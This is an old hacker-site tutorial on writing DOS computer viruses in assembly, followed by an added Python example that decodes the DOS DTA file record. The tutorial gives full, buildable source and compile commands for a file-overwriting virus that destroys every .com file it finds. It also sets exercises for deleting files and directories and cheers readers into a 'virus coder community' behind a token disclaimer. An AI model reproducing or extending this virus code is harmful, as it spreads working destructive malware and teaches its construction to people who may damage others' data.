Virus Creation - De la création des virus
Ombrae (bjdc@canl.nc)
Keywords: virus, virii, virus toolkit, creation, virii creation, viruses, worms

[Editor's Note: The content herein is strictly for educational purposes. Please do not use the information outlined in this article to harm anything or anyone. If you choose to do so, please keep in mind that the results are your fault, and hence not the fault of the author of this article, black.box.sk staff, *.box.sk staff, or the *.box.sk network]

[Edited for easier reading, by BinaryZer0@box.sk]

I'm not English, so [sorry about grammar errors, etc.]

"De la création des virus"

When I got my first computer, people always said [to] me: "...and don't forget to buy a good AV!" [At] this time, I didn't know what a computer virus [was]. So when I had my first one (Keypress), I just did a hard format of my HD. Indeed this was a good solution, as the virus was really wiped out, but so was all [of] my data! Next time, I used a good AV [that didn't] destroy my HD, but only the infected files (all the *.com in /windows and /dos), so I was really happy.

So, when I got access to the web, one of the first things I searched for was good texts on virii. First problem: there was a word I didn't understand: ASM. So I looked it up in my French/English dictionary (I'm French, which was the second problem), and found nothing. I'm not stupid, so I made a basic astalavista search (http://astalavista.box.sk, a good security related search engine), and found that Asm = Assembler. I found a tutorial, learned basic asm (mov ah, 09h / lea dx, stupid / int 21h....) and now I know how to make some of these nice little things that can bring you so much fun in a bored life... :)

So what is asm??? Asm stands for assembler, which is the most powerful and basic computer language... it is an older computer language, the ONE [that] can give you all (and more of) the power you need to create a virus.
It is possible to make virii in other languages, such as C, but it's not really 'elite', nor good, as high level languages generate [more] code than low level languages (like Asm). There are several different asm's, one per processor, so you can see ASM SPARC, MIPS, 80x86, 80x87, etc. If you use a PC, you must learn ASM 80x86. You can tell me that you don't have an 80x86, but a big PIII. Yes, but your PIII uses the 80x86 instruction set, plus other instructions specific to the PIII of course! (+ PII instructions, and Pentium, and 486, and 386 and 286... :) So when you write in assembly on a PC, you use asm 80x86... (PS: asm 80x87 = math coprocessor asm).

So, if you want to learn how to create a virus, you must learn Asm, and if you want to learn Asm, it's always good to have a pattern to copy, like a virus. :)

You need a compiler and a linker too. A compiler is a program used to generate [a] program. I suggest [using] MASM or TASM (respectively, Microsoft Asm and Turbo Asm) for the compiler, [which] you can find on the net. There are other compilers too (A86, NASM...), but I never used these. For the linker, use tlink (always with TASM) or link, which was a basic program that came with DOS (look in your old DOS version...) or with almost any compiler (I first used the Symantec C linker).

Now, the big part: basic Asm for beginners. There are lots of texts and tutorials; find as many as you can. Read them, smell them, learn them.... until you know the following:

mov ah, 09h
lea dx, phrase
int 21h
xor ah, ah
int 21h

then you know the very basic asm... Don't try to learn all the interrupts... Find HelpPC; it is a very good reference for coders.

Now the virus. This one is a very basic virus, a com-overwriting virus. It finds all the *.com files, then replaces them with its own code (the original code is destroyed).

; lots of coders use .TINY ; .CODE
; I prefer this one...
; which works with all compilers
_______________________________________________________________
code segment                    ; declaration of a segment named 'code'
assume cs:code, ds:code         ; make cs=ds=@ of code
                                ; cs = code segment, ds = data segment
                                ; in a com file, we use the same segment for both the data and the code
org 100h                        ; for the com too (the code starts at offset 100h, after the PSP)
                                ; h stands for hexadecimal
start:
        mov ah, 4eh             ; 4eh => DOS find first file function
        lea dx, mot             ; search file *.com
        xor cx, cx              ; xor cx, cx = mov cx, 0 (always use xor, not mov ,0)
        int 21h                 ; interrupt 21h (DOS interrupt)
ouverture:
        mov dx, 09eh            ; the 4eh function places the name found in the DTA, which is an important
                                ; part of the PSP... The name is at offset 9eh (DTA at 80h + name at 1eh)
        mov ah, 3dh             ; DOS open file function
        mov al, 01h             ; open for write (PS: better to use mov ax, 3d01h)
        int 21h
        jc error                ; if there is an error, goto error
        xchg ax, bx             ; exchange ax and bx... so bx is the handle of the file (faster than mov bx, ax)
        mov ah, 40h             ; DOS write file function
        mov cx, (offset finp - offset start) ; number of bytes to write (= finp - start)
        mov dx, 100h            ; we write our own code, so we start at 100h
        int 21h
        jc error                ; error? => goto error
        mov ah, 09h             ; DOS print to screen
        mov dx, offset adi      ; dx = offset of adi (= lea dx, adi)
        int 21h
        jmp fin                 ; goto fin
error:
        mov ah, 09h
        lea dx, erre            ; = mov dx, offset erre
        int 21h
fin:
        int 20h                 ; old DOS interrupt... = mov ah, 4ch / int 21h (quit prog)
adi     db "Finish!$"           ; our data
erre    db "There is an error$"
mot     db "*.com", 0           ; DOS wants an ASCIIZ (zero-terminated) filename
finp    label near              ; a label to know where the virus code ends
code ends
end start
______________________________________________________________________

compile with:
    tasm (or masm) name.asm
    tlink /t name          (or: link name, then exe2bin name.exe name.com)

Well, this is not a very good virus. It destroys the file, has poor code inside, the error part is useless, as is the adi part, and *.com files aren't as common as they used to be.... but this is an operational virus....
:) PS: any AV can detect this one....

Now the important part: how [does] it work??? Com files are old DOS programs that have a special structure.... When you run a com file, DOS chooses a segment (a segment is a 64KB portion of memory), then creates a PSP where it loads some info, and then places the code at offset 100h (the PSP is 256 bytes long, 256d = 100h, always think hexadecimal). The program in memory is the same as the one on the HD. At offset 80h of the PSP sits the DTA, which contains info on the file (length, date, time (of creation), name). After a successful use of the find file function, the DTA is filled with the info of the file found. The name is at offset 1eh of the DTA, so 80h + 1eh = 9eh. That is all there is to this type of virus.

Now create your own overwriting virus, and try to make it smaller. A smaller virus is often a faster virus. Compile it many times while testing some optimizations, and learn what works fine. Next time, the subject will be more difficult => com appender virus; this type of virus doesn't destroy the original program.

To test: try to use some DOS functions like:
_del file
_create/destroy a directory
_change directory
_get a string
_get a string, then try to check whether this is a file
_get a string, then destroy the file or the directory if it exists

This doesn't serve as a virus, but can be useful as an exercise.... Use the j.. (conditional jump) instructions for conditional loops... (I'll give you some example programs next time)

Welcome to the virii coder community,
Good luck,
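To make the PSP/DTA layout described above concrete, here is an added example (mine, not the article's code) that decodes the record DOS int 21h function 4Eh leaves in the default DTA. The offsets are the documented DOS ones: the DTA starts at PSP offset 80h and, inside the DTA, the found file's attribute byte sits at 15h, its packed time at 16h, its packed date at 18h, its 32-bit size at 1Ah and its ASCIIZ name at 1Eh, which is how the article arrives at 80h + 1Eh = 9Eh. SAMPLE_PSP and build_find_record are constructed for the demonstration and are not data from a real machine.

```python
"""Decode the DOS FindFirst/FindNext record that int 21h/4Eh leaves in the DTA.

Added example (not part of the original article). Layout of the record,
offsets relative to the start of the DTA:

    00h..14h  reserved (used internally by FindNext)
    15h       file attribute byte
    16h       file time, DOS packed format
    18h       file date, DOS packed format
    1Ah       file size, 32-bit little-endian
    1Eh       ASCIIZ filename (up to 12 characters + terminator)

The default DTA is at PSP offset 80h, so the name lives at PSP offset
80h + 1Eh = 9Eh, the value the article's virus loads into dx.
"""
import struct

PSP_DTA_OFFSET = 0x80
DTA_NAME_OFFSET = 0x1E
PSP_NAME_OFFSET = PSP_DTA_OFFSET + DTA_NAME_OFFSET  # 0x9E
FIND_RECORD_LEN = 0x2B  # 43 bytes


def decode_dos_time(packed):
    """DOS time word: bits 15-11 hour, 10-5 minute, 4-0 seconds/2."""
    return (packed >> 11) & 0x1F, (packed >> 5) & 0x3F, (packed & 0x1F) * 2


def decode_dos_date(packed):
    """DOS date word: bits 15-9 years since 1980, 8-5 month, 4-0 day."""
    return 1980 + ((packed >> 9) & 0x7F), (packed >> 5) & 0x0F, packed & 0x1F


def parse_find_record(dta):
    """Parse the FindFirst result stored at the start of a DTA."""
    if len(dta) < FIND_RECORD_LEN:
        raise ValueError("DTA too short for a FindFirst record")
    # '<' = little-endian, no padding: B at 15h, H at 16h, H at 18h, I at 1Ah
    attr, ftime, fdate, size = struct.unpack_from("<BHHI", dta, 0x15)
    raw_name = dta[DTA_NAME_OFFSET:DTA_NAME_OFFSET + 13]
    name = raw_name.split(b"\x00", 1)[0].decode("ascii")
    return {
        "attribute": attr,
        "time": decode_dos_time(ftime),
        "date": decode_dos_date(fdate),
        "size": size,
        "name": name,
    }


def parse_psp_find_record(psp):
    """Same, but starting from a whole 256-byte PSP (default DTA at 80h)."""
    return parse_find_record(psp[PSP_DTA_OFFSET:])


def build_find_record(name, size, attr=0x20, hour=12, minute=30, second=0,
                      year=1999, month=6, day=15):
    """Construct a FindFirst record the way DOS lays it out (sample builder)."""
    ftime = (hour << 11) | (minute << 5) | (second // 2)
    fdate = ((year - 1980) << 9) | (month << 5) | day
    record = bytes(0x15) + struct.pack("<BHHI", attr, ftime, fdate, size)
    return record + name.encode("ascii").ljust(13, b"\x00")


# Constructed sample PSP: 80h bytes of (zeroed) header, then a DTA holding
# the record for a 2817-byte file called TEST.COM.
SAMPLE_PSP = bytes(PSP_DTA_OFFSET) + build_find_record("TEST.COM", 2817).ljust(0x80, b"\x00")

if __name__ == "__main__":
    info = parse_psp_find_record(SAMPLE_PSP)
    print(info)
    print("name found at PSP offset %02Xh" % SAMPLE_PSP.index(b"TEST.COM"))
```

Running it shows the name landing at offset 9Eh of the sample PSP, which is the whole reason the virus can pass a fixed address to the open call instead of copying the name anywhere.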